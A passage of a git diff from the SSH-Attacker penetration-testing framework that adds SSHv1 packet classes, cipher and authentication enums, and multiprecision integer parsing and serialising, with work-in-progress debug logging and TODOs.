a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/AuthenticationMethodSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/AuthenticationMethodSSHv1.java new file mode 100644 index 000000000..d24b495c0 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/AuthenticationMethodSSHv1.java @@ -0,0 +1,49 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.constants; + +import java.util.Collections; +import java.util.Map; +import java.util.TreeMap; + +public enum AuthenticationMethodSSHv1 { + + // Ciphermethods from ssh1.2.28 + SSH_CIPHER_NONE(0), + SSH_AUTH_RHOSTS(1), + SSH_AUTH_RSA(2), + SSH_AUTH_PASSWORD(3), + SSH_AUTH_RHOSTS_RSA(4), + SSH_AUTH_TIS(5), + SSSSH_AUTH_KERBEROSH_CIPHER_RESERVED(6), + SSH_PASS_KERBEROS_TGT(7); + + private final int id; + + public static final Map map; + + static { + Map mutableMap = new TreeMap<>(); + for (AuthenticationMethodSSHv1 constant : AuthenticationMethodSSHv1.values()) { + mutableMap.put(constant.id, constant); + } + map = Collections.unmodifiableMap(mutableMap); + } + + AuthenticationMethodSSHv1(int id) { + this.id = id; + } + + public int getId() { + return id; + } + + public static AuthenticationMethodSSHv1 fromId(int id) { + return map.get(id); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/CipherMethod.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/CipherMethod.java new file mode 100644 index 000000000..34e1ce382 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/CipherMethod.java @@ -0,0 +1,49 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.constants; + +import java.util.Collections; +import java.util.Map; +import java.util.TreeMap; + +public enum CipherMethod { + + // Ciphermethods from ssh1.2.28 + SSH_CIPHER_NONE(0), + SSH_CIPHER_IDEA(1), + SSH_CIPHER_DES(2), + SSH_CIPHER_3DES(3), + CIPHER_NOT_SET(4), + SSH_CIPHER_ARCFOUR(5), + SSH_CIPHER_BLOWFISH(6), + SSH_CIPHER_RESERVED(7); + + private final int id; + + public static final Map map; + + static { + Map mutableMap = new TreeMap<>(); + for (CipherMethod constant : CipherMethod.values()) { + mutableMap.put(constant.id, constant); + } + map = Collections.unmodifiableMap(mutableMap); + } + + CipherMethod(int id) { + this.id = id; + } + + public int getId() { + return id; + } + + public static CipherMethod fromId(int id) { + return map.get(id); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index b2752f11b..e858bb1f2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -129,6 +129,11 @@ public PacketCipher getActiveDecryptCipher() { // endregion // region Key Exchange Initialization + + // SSHv1 + private List supportedCipherMethods; + private List supportedAuthenticationMethods; + /** Client cookie containing 16 random bytes */ private byte[] clientCookie; /** Server cookie containing 16 random bytes */ @@ -276,6 +281,14 @@ public void setMessageLayer(MessageLayer messageLayer) { /** If set to true, a version exchange message was sent by each side */ private boolean versionExchangeCompleted = false; + public List getSupportedCipherMethods() { + return supportedCipherMethods; + } + + public void setSupportedCipherMethods(List supportedCipherMethods) { + this.supportedCipherMethods = supportedCipherMethods; + } + public byte[] getLastHandledAuthenticationMessageData() { return lastHandledApplicationMessageData; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java index f70c7e42a..099ba701a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Parser.java @@ -196,6 +196,19 @@ protected String parseByteString(int length, Charset charset) { return new String(parseByteArrayField(length), charset); } + protected BigInteger parseMultiprecision() { + int lenght = parseIntField(2); + LOGGER.debug("[bro] got lenght before resize: {}", lenght); + int resize = 0; + if (lenght % 8 != 0) { + resize = 8 - lenght % 8; + } + + lenght = (lenght + resize) / 8; + LOGGER.debug("[bro] got lenght after resize: {}", lenght); + return parseBigIntField(lenght); + } + /** * Returns the parsed object. * diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Serializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Serializer.java index e42f01f71..621b71a8f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Serializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/data/Serializer.java @@ -91,6 +91,20 @@ public final void appendBigInteger(BigInteger i, int length) { appendBytes(bytes); } + public final void appendMultiPrecision(BigInteger i) { + byte[] bytes; + int lenght = i.bitLength(); + LOGGER.debug("MPI is {} Bit long", lenght); + bytes = ArrayConverter.intToBytes(lenght, 2); + appendBytes(bytes); + LOGGER.debug(" -> Appended Length {}", ArrayConverter.bytesToHexString(bytes)); + + bytes = ArrayConverter.bigIntegerToByteArray(i); + LOGGER.debug(" -> Appended MPI-Value {}", ArrayConverter.bytesToHexString(bytes)); + + appendBytes(bytes); + } + /** * Adds a byte to the final byte[]. * diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index 4c93f47e5..aae870160 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -7,6 +7,7 @@ */ package de.rub.nds.sshattacker.core.layer.impl; +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.layer.LayerConfiguration; @@ -23,9 +24,11 @@ import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.BinaryPacket; +import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.parser.AbstractPacketParser; import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParser; +import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParserSSHv1; import de.rub.nds.sshattacker.core.packet.parser.BlobPacketParser; import de.rub.nds.sshattacker.core.protocol.transport.message.AsciiMessage; import de.rub.nds.sshattacker.core.protocol.transport.parser.*; @@ -101,8 +104,13 @@ public LayerProcessingResult sendData( LOGGER.debug("[bro] Created a BLOB Packet"); packet = new BlobPacket(); } else { - LOGGER.debug("[bro] Created a Binary Packet"); - packet = new BinaryPacket(); + if (this.getHigherLayer().getLayerType().getName().equals("SSHv1")) { + LOGGER.debug("[bro] Created a Binary SSHv1 Packet"); + packet = new BinaryPacketSSHv1(); + } else { + LOGGER.debug("[bro] Created a Binary SSHv2 Packet"); + packet = new BinaryPacket(); + } } packet.setPayload(additionalData); @@ -140,12 +148,22 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException LOGGER.debug("[bro] Recieving a {}", context.getPacketLayer()); if (context.getPacketLayerType() == PacketLayerType.BINARY_PACKET) { - parser = - new BinaryPacketParser( - dataStream, - context.getPacketLayer().getDecryptorCipher(), - context.getReadSequenceNumber()); - packet = new BinaryPacket(); + if (this.getHigherLayer().getLayerType().getName().equals("SSHv1")) { + parser = + new BinaryPacketParserSSHv1( + dataStream, + context.getPacketLayer().getDecryptorCipher(), + context.getReadSequenceNumber()); + packet = new BinaryPacketSSHv1(); + } else { + parser = + new BinaryPacketParser( + dataStream, + context.getPacketLayer().getDecryptorCipher(), + context.getReadSequenceNumber()); + packet = new BinaryPacket(); + } + } else if (context.getPacketLayerType() == PacketLayerType.BLOB) { parser = new BlobPacketParser(dataStream); packet = new BlobPacket(); @@ -166,7 +184,29 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException "[bro] Decompressed Payload: {}", ArrayConverter.bytesToHexString(packet.getPayload())); - packet.setCleanProtocolMessageBytes(packet.getPayload()); + if (packet instanceof BinaryPacketSSHv1) { + BinaryPacketSSHv1 binaryPacketSSHv1 = (BinaryPacketSSHv1) packet; + + int paddingLenght = (8 - binaryPacketSSHv1.getLength().getValue() % 8); + byte[] padding = Arrays.copyOfRange(packet.getPayload().getValue(), 0, paddingLenght); + byte[] cleanContent = + Arrays.copyOfRange( + packet.getPayload().getValue(), + paddingLenght, + binaryPacketSSHv1.getLength().getValue() + paddingLenght); + + LOGGER.debug( + "Lenght = {}, so padding is {} long and has {} as value, clean is now {} which is {} long", + binaryPacketSSHv1.getLength().getValue(), + paddingLenght, + padding, + ArrayConverter.bytesToHexString(cleanContent), + cleanContent.length); + packet.setCleanProtocolMessageBytes( + ModifiableVariableFactory.safelySetValue(null, cleanContent)); + } else { + packet.setCleanProtocolMessageBytes(packet.getPayload()); + } addProducedContainer(packet); LayerProcessingHint currentHint; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java new file mode 100644 index 000000000..6b3e9167e --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java @@ -0,0 +1,213 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.packet; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.ModifiableVariableProperty; +import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.modifiablevariable.singlebyte.ModifiableByte; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.data.DataContainer; +import de.rub.nds.sshattacker.core.packet.handler.BinaryPacketHandlerSSHv1; +import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParserSSHv1; +import de.rub.nds.sshattacker.core.packet.preparator.BinaryPacketPreparatorSSHv1; +import de.rub.nds.sshattacker.core.packet.serializer.BinaryPacketSerializerSSHv1; +import de.rub.nds.sshattacker.core.protocol.common.ModifiableVariableHolder; +import java.io.InputStream; +import java.util.List; +import java.util.Objects; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class BinaryPacketSSHv1 extends AbstractPacket + implements DataContainer { + + private static final Logger LOGGER = LogManager.getLogger(); + + /** + * The length of the packet in bytes, not including 'mac' or the 'packet_length' field itself. + */ + @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.LENGTH) + private ModifiableInteger length; + + /** The length of the padding. Must be at least 4 bytes and at most 255 bytes to be valid. */ + @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.LENGTH) + private ModifiableByte paddingLength; + + /** The padding bytes of the packet. */ + @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PADDING) + private ModifiableByteArray padding; + + /** The MAC (or authentication tag if AEAD encryption is used) of the packet. */ + @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.HMAC) + private ModifiableByteArray mac; + + /** + * The implicit sequence number of this packet which is used in MAC computations as well as + * SSH_MSG_UNIMPLEMENTED. + */ + @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.COUNT) + private ModifiableInteger sequenceNumber; + + /** A holder instance for all temporary fields used during crypto computations. */ + private PacketCryptoComputations computations; + + public BinaryPacketSSHv1() {} + + public ModifiableInteger getLength() { + return length; + } + + public void setLength(ModifiableInteger length) { + this.length = length; + } + + public void setLength(int length) { + this.length = ModifiableVariableFactory.safelySetValue(this.length, length); + } + + public ModifiableByte getPaddingLength() { + return paddingLength; + } + + public void setPaddingLength(ModifiableByte paddingLength) { + this.paddingLength = paddingLength; + } + + public void setPaddingLength(byte paddingLength) { + this.paddingLength = + ModifiableVariableFactory.safelySetValue(this.paddingLength, paddingLength); + } + + public ModifiableByteArray getPadding() { + return padding; + } + + public void setPadding(ModifiableByteArray padding) { + this.padding = padding; + } + + public void setPadding(byte[] padding) { + this.padding = ModifiableVariableFactory.safelySetValue(this.padding, padding); + } + + public ModifiableByteArray getMac() { + return mac; + } + + public void setMac(ModifiableByteArray mac) { + this.mac = mac; + } + + public void setMac(byte[] mac) { + this.mac = ModifiableVariableFactory.safelySetValue(this.mac, mac); + } + + public ModifiableInteger getSequenceNumber() { + return sequenceNumber; + } + + public void setSequenceNumber(ModifiableInteger sequenceNumber) { + this.sequenceNumber = sequenceNumber; + } + + public void setSequenceNumber(int sequenceNumber) { + this.sequenceNumber = + ModifiableVariableFactory.safelySetValue(this.sequenceNumber, sequenceNumber); + } + /* + @Override + public BinaryPacketPreparator getPacketPreparator( + Chooser chooser, AbstractPacketEncryptor encryptor, PacketCompressor compressor) { + return new BinaryPacketPreparator(chooser, this, encryptor, compressor); + } + + */ + /* @Override + public BinaryPacketParser getPacketParser( + byte[] array, int startPosition, PacketCipher activeDecryptCipher, int sequenceNumber) { + return new BinaryPacketParser(array, startPosition, activeDecryptCipher, sequenceNumber); + }*/ + /* + + @Override + public BinaryPacketSerializer getPacketSerializer() { + return new BinaryPacketSerializer(this); + }*/ + + public PacketCryptoComputations getComputations() { + return computations; + } + + public void setComputations(PacketCryptoComputations computations) { + this.computations = computations; + } + + @Override + public void prepareComputations() { + LOGGER.info("[bro] Preparing Computation"); + if (computations == null) { + computations = new PacketCryptoComputations(); + } + } + + @Override + public String toString() { + return "BinaryPacket{length=" + length + "}"; + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + BinaryPacketSSHv1 that = (BinaryPacketSSHv1) o; + return Objects.equals(length, that.length) + && Objects.equals(sequenceNumber, that.sequenceNumber) + && Objects.equals(computations, that.computations); + } + + @Override + public int hashCode() { + return Objects.hash(length, sequenceNumber, computations); + } + + @Override + public List getAllModifiableVariableHolders() { + List holders = super.getAllModifiableVariableHolders(); + if (computations != null) { + holders.add(computations); + } + return holders; + } + + @Override + public BinaryPacketParserSSHv1 getParser(SshContext context, InputStream stream) { + return new BinaryPacketParserSSHv1( + stream, context.getActiveDecryptCipher(), sequenceNumber.getValue()); + } + + @Override + public BinaryPacketPreparatorSSHv1 getPreparator(SshContext context) { + return new BinaryPacketPreparatorSSHv1( + context.getChooser(), + this, + context.getPacketLayer().getEncryptor(), + context.getCompressor()); + } + + @Override + public BinaryPacketSerializerSSHv1 getSerializer(SshContext context) { + return new BinaryPacketSerializerSSHv1(this); + } + + @Override + public BinaryPacketHandlerSSHv1 getHandler(SshContext context) { + return new BinaryPacketHandlerSSHv1(context); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java index 619e46bec..678fe1efe 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java @@ -14,6 +14,7 @@ import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.BinaryPacket; +import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.PacketCryptoComputations; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; @@ -66,6 +67,18 @@ public PacketChaCha20Poly1305Cipher(SshContext context, KeySet keySet, CipherMod true); } + @Override + public void encrypt(BinaryPacketSSHv1 packet) { + LOGGER.warn("SSHv1 does not Support CHACHA20 Cipher"); + throw new RuntimeException(); + } + + @Override + public void decrypt(BinaryPacketSSHv1 packet) { + LOGGER.warn("SSHv1 does not Support GCM Cipher"); + throw new RuntimeException(); + } + @Override protected void encrypt(BinaryPacket packet) throws CryptoException { if (packet.getComputations() == null) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java index 69caaffad..8e8caa1fa 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java @@ -13,6 +13,7 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.layer.data.Parser; import de.rub.nds.sshattacker.core.packet.BinaryPacket; +import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; import de.rub.nds.tlsattacker.transport.ConnectionEndType; @@ -64,6 +65,14 @@ public final void process(BinaryPacket packet) throws CryptoException { } } + public final void process(BinaryPacketSSHv1 packet) throws CryptoException { + if (mode == CipherMode.ENCRYPT) { + encrypt(packet); + } else { + decrypt(packet); + } + } + /** * Encrypts or decrypts the provided packet using this PacketCipher instance (the actual * operation performed depends on the mode provided to the constructor). @@ -81,10 +90,14 @@ public final void process(BlobPacket packet) throws CryptoException { protected abstract void encrypt(BinaryPacket packet) throws CryptoException; + protected abstract void encrypt(BinaryPacketSSHv1 packet) throws CryptoException; + protected abstract void encrypt(BlobPacket packet) throws CryptoException; protected abstract void decrypt(BinaryPacket packet) throws CryptoException; + protected abstract void decrypt(BinaryPacketSSHv1 packet) throws CryptoException; + protected abstract void decrypt(BlobPacket packet) throws CryptoException; public EncryptionAlgorithm getEncryptionAlgorithm() { @@ -122,6 +135,15 @@ protected byte[] calculatePadding(int paddingLength) { return new byte[paddingLength]; } + protected byte calculatePaddingLengthSSHv1(BinaryPacketSSHv1 packet) { + + // TODO: fix later, just for debugging padding + int lenght = packet.getCompressedPayload().getValue().length; + int padding_lenght = 8 - (lenght % 8); + + return (byte) padding_lenght; + } + protected byte calculatePaddingLength(BinaryPacket packet) { int effectiveBlockSize = encryptionAlgorithm.getBlockSize(); // If the block size of the cipher is smaller than 8, 8 is used as the block size diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketGCMCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketGCMCipher.java index 33db03a4f..1aaa013a4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketGCMCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketGCMCipher.java @@ -14,6 +14,7 @@ import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.BinaryPacket; +import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.PacketCryptoComputations; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; @@ -65,6 +66,18 @@ public PacketGCMCipher( 12)); } + @Override + public void encrypt(BinaryPacketSSHv1 packet) { + LOGGER.warn("SSHv1 does not Support GCM Cipher"); + throw new RuntimeException(); + } + + @Override + public void decrypt(BinaryPacketSSHv1 packet) { + LOGGER.warn("SSHv1 does not Support GCM Cipher"); + throw new RuntimeException(); + } + @Override public void encrypt(BinaryPacket packet) throws CryptoException { if (packet.getComputations() == null) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java index 455baff13..f61f9dd27 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java @@ -16,10 +16,7 @@ import de.rub.nds.sshattacker.core.crypto.mac.MacFactory; import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.packet.AbstractPacket; -import de.rub.nds.sshattacker.core.packet.BinaryPacket; -import de.rub.nds.sshattacker.core.packet.BlobPacket; -import de.rub.nds.sshattacker.core.packet.PacketCryptoComputations; +import de.rub.nds.sshattacker.core.packet.*; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; import java.math.BigInteger; import java.security.NoSuchAlgorithmException; @@ -88,6 +85,28 @@ public PacketMacedCipher( } } + @Override + public void encrypt(BinaryPacketSSHv1 packet) { + packet.setPaddingLength(calculatePaddingLengthSSHv1(packet)); + packet.setPadding(calculatePadding(packet.getPaddingLength().getValue())); + packet.setLength(packet.getCompressedPayload().getValue().length); + + PacketCryptoComputations computations = packet.getComputations(); + try { + encryptInner(packet); + } catch (CryptoException e) { + throw new RuntimeException(e); + } + + computations.setEncryptedPacketFields( + Stream.of(BinaryPacketField.PAYLOAD).collect(Collectors.toSet())); + } + + @Override + public void decrypt(BinaryPacketSSHv1 packet) throws CryptoException { + decryptInner(packet); + } + @Override public void encrypt(BinaryPacket packet) throws CryptoException { if (packet.getComputations() == null) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/AbstractPacketDecryptor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/AbstractPacketDecryptor.java index bd76fb2ca..0b97a75e6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/AbstractPacketDecryptor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/AbstractPacketDecryptor.java @@ -9,6 +9,7 @@ import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.BinaryPacket; +import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; @@ -21,6 +22,8 @@ public AbstractPacketDecryptor(PacketCipher cipher) { public void decrypt(AbstractPacket object) { if (object instanceof BinaryPacket) { decrypt((BinaryPacket) object); + } else if (object instanceof BinaryPacketSSHv1) { + decrypt((BinaryPacketSSHv1) object); } else if (object instanceof BlobPacket) { decrypt((BlobPacket) object); } else { @@ -30,5 +33,7 @@ public void decrypt(AbstractPacket object) { public abstract void decrypt(BinaryPacket object); + public abstract void decrypt(BinaryPacketSSHv1 object); + public abstract void decrypt(BlobPacket object); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/AbstractPacketEncryptor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/AbstractPacketEncryptor.java index d06b80e42..396162b8c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/AbstractPacketEncryptor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/AbstractPacketEncryptor.java @@ -9,6 +9,7 @@ import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.BinaryPacket; +import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; @@ -21,6 +22,8 @@ public AbstractPacketEncryptor(PacketCipher cipher) { public void encrypt(AbstractPacket object) { if (object instanceof BinaryPacket) { encrypt((BinaryPacket) object); + } else if (object instanceof BinaryPacketSSHv1) { + encrypt((BinaryPacketSSHv1) object); } else if (object instanceof BlobPacket) { encrypt((BlobPacket) object); } else { @@ -30,5 +33,7 @@ public void encrypt(AbstractPacket object) { public abstract void encrypt(BinaryPacket object); + public abstract void encrypt(BinaryPacketSSHv1 object); + public abstract void encrypt(BlobPacket object); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketDecryptor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketDecryptor.java index 8dec11181..dc7814845 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketDecryptor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketDecryptor.java @@ -11,6 +11,7 @@ import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.BinaryPacket; +import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; @@ -34,6 +35,24 @@ public PacketDecryptor(PacketCipher packetCipher, SshContext context) { noneCipher = PacketCipherFactory.getNoneCipher(context, CipherMode.DECRYPT); } + @Override + public void decrypt(BinaryPacketSSHv1 packet) { + PacketCipher packetCipher = getPacketMostRecentCipher(); + LOGGER.debug("Decrypting binary packet using packet cipher: {}", packetCipher); + try { + packet.setSequenceNumber(context.getReadSequenceNumber()); + packetCipher.process(packet); + } catch (CryptoException e) { + LOGGER.warn("Could not decrypt binary packet. Using " + noneCipher, e); + try { + noneCipher.process(packet); + } catch (CryptoException ex) { + LOGGER.error("Could not decrypt with " + noneCipher, ex); + } + } + context.incrementReadSequenceNumber(); + } + @Override public void decrypt(BinaryPacket packet) { PacketCipher packetCipher = getPacketMostRecentCipher(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketEncryptor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketEncryptor.java index 871ffd827..5b2c487d0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketEncryptor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/crypto/PacketEncryptor.java @@ -11,6 +11,7 @@ import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.BinaryPacket; +import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; @@ -52,6 +53,23 @@ public void encrypt(BinaryPacket packet) { context.incrementWriteSequenceNumber(); } + // TODO Adding real Encryption after Handshake + @Override + public void encrypt(BinaryPacketSSHv1 packet) { + PacketCipher packetCipher = getPacketMostRecentCipher(); + try { + packet.setSequenceNumber(context.getWriteSequenceNumber()); + packetCipher.process(packet); + } catch (CryptoException e) { + LOGGER.warn("Could not encrypt binary packet. Using " + noneCipher, e); + try { + noneCipher.process(packet); + } catch (CryptoException ex) { + LOGGER.error("Could not encrypt with " + noneCipher, ex); + } + } + } + @Override public void encrypt(BlobPacket packet) { PacketCipher packetCipher = getPacketMostRecentCipher(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandlerSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandlerSSHv1.java new file mode 100644 index 000000000..a38f65c7e --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandlerSSHv1.java @@ -0,0 +1,21 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.packet.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; + +public class BinaryPacketHandlerSSHv1 extends AbstractPacketHandler { + + public BinaryPacketHandlerSSHv1(SshContext context) { + super(context); + } + + @Override + public void adjustContext(BinaryPacketSSHv1 object) {} +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParserSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParserSSHv1.java new file mode 100644 index 000000000..66e565f23 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParserSSHv1.java @@ -0,0 +1,214 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 